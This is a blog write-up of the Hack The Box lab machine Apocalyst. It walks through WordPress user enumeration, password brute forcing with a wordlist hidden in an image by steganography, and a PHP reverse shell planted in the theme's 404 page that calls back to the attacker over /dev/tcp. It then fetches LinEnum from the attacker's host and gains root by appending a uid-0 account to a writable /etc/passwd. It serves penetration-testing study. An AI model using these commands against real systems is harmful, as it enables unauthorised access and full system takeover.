Ech0 - 27 / 02 / 2020

Apocalyst Writeup

Introduction :



Apocalyst is a medium linux box released back in August 2017

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.


  λ ech0 [ 10.10.14.7/23 ] [~]
  → nmap -F 10.10.10.46
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 12:27 GMT
  Nmap scan report for 10.10.10.46
  Host is up (0.11s latency).
  Not shown: 98 closed ports
  PORT   STATE SERVICE
  22/tcp open  ssh
  80/tcp open  http

  Nmap done: 1 IP address (1 host up) scanned in 1.73 seconds


  λ ech0 [ 10.10.14.7/23 ] [~]
  → nmap -sCV -p80,22 10.10.10.46
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 12:28 GMT
  Nmap scan report for 10.10.10.46
  Host is up (0.095s latency).

  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
  |   256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
  |_  256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-generator: WordPress 4.8
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  |_http-title: Apocalypse Preparation Blog
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds

Part 2 : Getting User Access



Our nmap scan picked up the 80th port running http so let's investigate it :


  λ root [ 10.10.14.11/23 ] [/home/ech0]
→ echo '10.10.10.46 apocalyst.htb' >> /etc/hosts

Once we add the apocalyst.htb domain name to our /etc/hosts file, we fix the formatting issue of what seems to be a wordpress website. Now let's run the wpscan command to see if we can find anything obvious :


  λ root [ 10.10.14.11/23 ] [/home/ech0]
  → wpscan --url http://10.10.10.46 -e
  _______________________________________________________________
           __          _______   _____
           \ \        / /  __ \ / ____|
            \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
             \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
              \  /\  /  | |     ____) | (__| (_| | | | |
               \/  \/   |_|    |_____/ \___|\__,_|_| |_|

           WordPress Security Scanner by the WPScan Team
                           Version 3.7.8
         Sponsored by Automattic - https://automattic.com/
         @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  _______________________________________________________________

  [+] URL: http://10.10.10.46/
  [+] Started: Mon Mar  2 14:32:34 2020

  Interesting Finding(s):

  [+] http://10.10.10.46/
   | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
   | Found By: Headers (Passive Detection)
   | Confidence: 100%

  [+] http://10.10.10.46/xmlrpc.php
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 100%
   | References:
   |  - http://codex.wordpress.org/XML-RPC_Pingback_API
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
   |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[i] User(s) Identified:

[+] falaraki
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon Mar  2 14:33:48 2020
[+] Requests Done: 3064
[+] Cached Requests: 43
[+] Data Sent: 757.552 KB
[+] Data Received: 440.874 KB
[+] Memory used: 203.988 MB
[+] Elapsed time: 00:01:14

And we have a username ! falaraki now let's make a directory wordlist using cewl, and then use owasp's dirbuster using the wordlist we created.


  λ ech0 [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
→ cewl http://10.10.10.46 > directories.txt

and now passing the wordlist to dirbuster :

Here we see that there is something odd with the Rightiousness directory, the size of the response doesn't correspond to the others (421 and here 440) So upon further investigation, we see that the webpage in question has just one image in jpg format. Looking at the sourcecode we get hinted towards a "needle" or perhaps in this case, steganography that's why we'll use the steghide command :


  λ ech0 [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
  → wget http://10.10.10.46/Rightiousness/image.jpg
  --2020-03-02 14:49:22--  http://10.10.10.46/Rightiousness/image.jpg
  Connecting to 10.10.10.46:80... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 215541 (210K) [image/jpeg]
  Saving to: ‘image.jpg’

  image.jpg                     100%[===============================================>] 210.49K   435KB/s    in 0.5s

  2020-03-02 14:49:23 (435 KB/s) - ‘image.jpg’ saved [215541/215541]


  λ ech0 [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
  → steghide extract -sf image.jpg
  Enter passphrase:
  wrote extracted data to "list.txt".

And we get a wordlist named "list.txt", let's try to use this wordlist as a password, using wpscan one more time.


  λ ech0 [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
→ sudo wpscan --url http://apocalyst.htb --usernames falaraki --passwords list.txt
[sudo] password for ech0:
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.8
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://apocalyst.htb/
[+] Started: Mon Mar  2 14:53:34 2020

Interesting Finding(s):

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - falaraki / Transclisiation
Trying falaraki / total Time: 00:00:16 <==========================================> (335 / 335) 100.00% Time: 00:00:16

[i] Valid Combinations Found:
 | Username: falaraki, Password: Transclisiation

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon Mar  2 14:54:01 2020
[+] Requests Done: 388
[+] Cached Requests: 5
[+] Data Sent: 116.313 KB
[+] Data Received: 1.533 MB
[+] Memory used: 184.266 MB
[+] Elapsed time: 00:00:26

and we have found credentials ! falaraki:Transclisiation so let's try to login at the corresponding url http://apocalyst.htb/wp-login :

And we are logged in ! now moving over to the appearance page we'll upload our reverse php shell :


  λ ech0 [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
→ locate ech0.php
/home/ech0/_HTB/Bastard/ech0.php
/home/ech0/_HTB/Cronos/ech0.php
/home/ech0/_HTB/Haircut/ech0.php
/home/ech0/_HTB/Networked/ech0.php.gif
/home/ech0/_HTB/October/ech0.php5
/home/ech0/_HTB/Popcorn/ech0.php
/home/ech0/_HTB/Popcorn/ech0.php.gif

λ ech0 [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
→ cp /home/ech0/_HTB/Cronos/ech0.php .

λ ech0 [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
→ nano ech0.php

  <?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.11/9001 0>&1'");
?>

Once we have updated the 404.php page we just have to browse to it for it to connect back to us:

And we get a reverse shell as www-data ! let's see if we can print out the user flag :


  www-data@apocalyst:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@apocalyst:/$ cd home
cd home
www-data@apocalyst:/home$ ls
ls
falaraki
www-data@apocalyst:/home$ cd falaraki
cd falaraki
www-data@apocalyst:/home/falaraki$ cat user.txt
cat user.txt
91XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it ! we have been able to print out the user flag.

Part 3 : Getting Root Access



Now before we attempt to privesc let's spawn a tty shell using python3, since python1 isn't there on the machine.


  www-data@apocalyst:/home/falaraki$ which python
which python
www-data@apocalyst:/home/falaraki$ which python3
which python3
/usr/bin/python3
www-data@apocalyst:/home/falaraki$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@apocalyst:/home/falaraki$ ls
ls
user.txt

www-data@apocalyst:/home/falaraki$ which wget
which wget
/usr/bin/wget

Now that we have wget on the machine, we can enumerate the machine by uploading LinEnum.sh into the /tmp directory.


  ww-data@apocalyst:/home/falaraki$ cd /tmp
cd /tmp
www-data@apocalyst:/tmp$ wget 10.10.14.11:1234/LinEnum.sh
wget 10.10.14.11:1234/LinEnum.sh
--2020-03-02 15:28:52--  http://10.10.14.11:1234/LinEnum.sh
Connecting to 10.10.14.11:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh          100%[===================>]  45.54K   225KB/s    in 0.2s

2020-03-02 15:28:52 (225 KB/s) - 'LinEnum.sh' saved [46631/46631]

www-data@apocalyst:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
www-data@apocalyst:/tmp$ ./LinEnum.sh

Then looking at the results, we see that we can read/write (RW) into sensitive files within /etc most notably passwd, group, noprofile or shadow. so let's use openssl to generate a password (123) :


  λ ech0 [ 10.10.14.11/23 ] [~]
→ openssl passwd -1
Password:
Verifying - Password:
$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/

Now with this we can construct a line to add in /etc/passwd :


  root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash

  www-data@apocalyst:/etc$ echo 'root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash' >> passwd

  www-data@apocalyst:/etc$ cat passwd
  cat passwd
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
  systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
  systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
  systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
  syslog:x:104:108::/home/syslog:/bin/false
  _apt:x:105:65534::/nonexistent:/bin/false
  lxd:x:106:65534::/var/lib/lxd/:/bin/false
  messagebus:x:107:111::/var/run/dbus:/bin/false
  uuidd:x:108:112::/run/uuidd:/bin/false
  dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  falaraki:x:1000:1000:Falaraki Rainiti,,,:/home/falaraki:/bin/bash
  sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
  mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
  ech0:$1$k48ck7uo$/CibZLSHGr7wiCQJWNQNW./:0:0:ech0:/root:/bin/bash
  ech0:$1$dkV9okB6$oRhhfakYp7/2QRZpsD0570/:0:0:ech0:/root:/bin/bash
  root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash

Now that's done let's su as root2


  www-data@apocalyst:/etc$ su root2
  su root2
  Password: 123

  root@apocalyst:/etc# id
  id
  uid=0(root) gid=0(root) groups=0(root)

And that's it ! we have been able to log into the second root user we just created, effectively escalating privileges to the root permissions. now we just have to print our root flag :


  root@apocalyst:/etc# cat /root/root.txt
  cat /root/root.txt
  1cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Conclusion



Here we can see the progress graph :

My Bunker

Some Address 67120,
Duttlenheim, France.

About Ech0

This cute theme was created to showcase your work in a simple way. Use it wisely.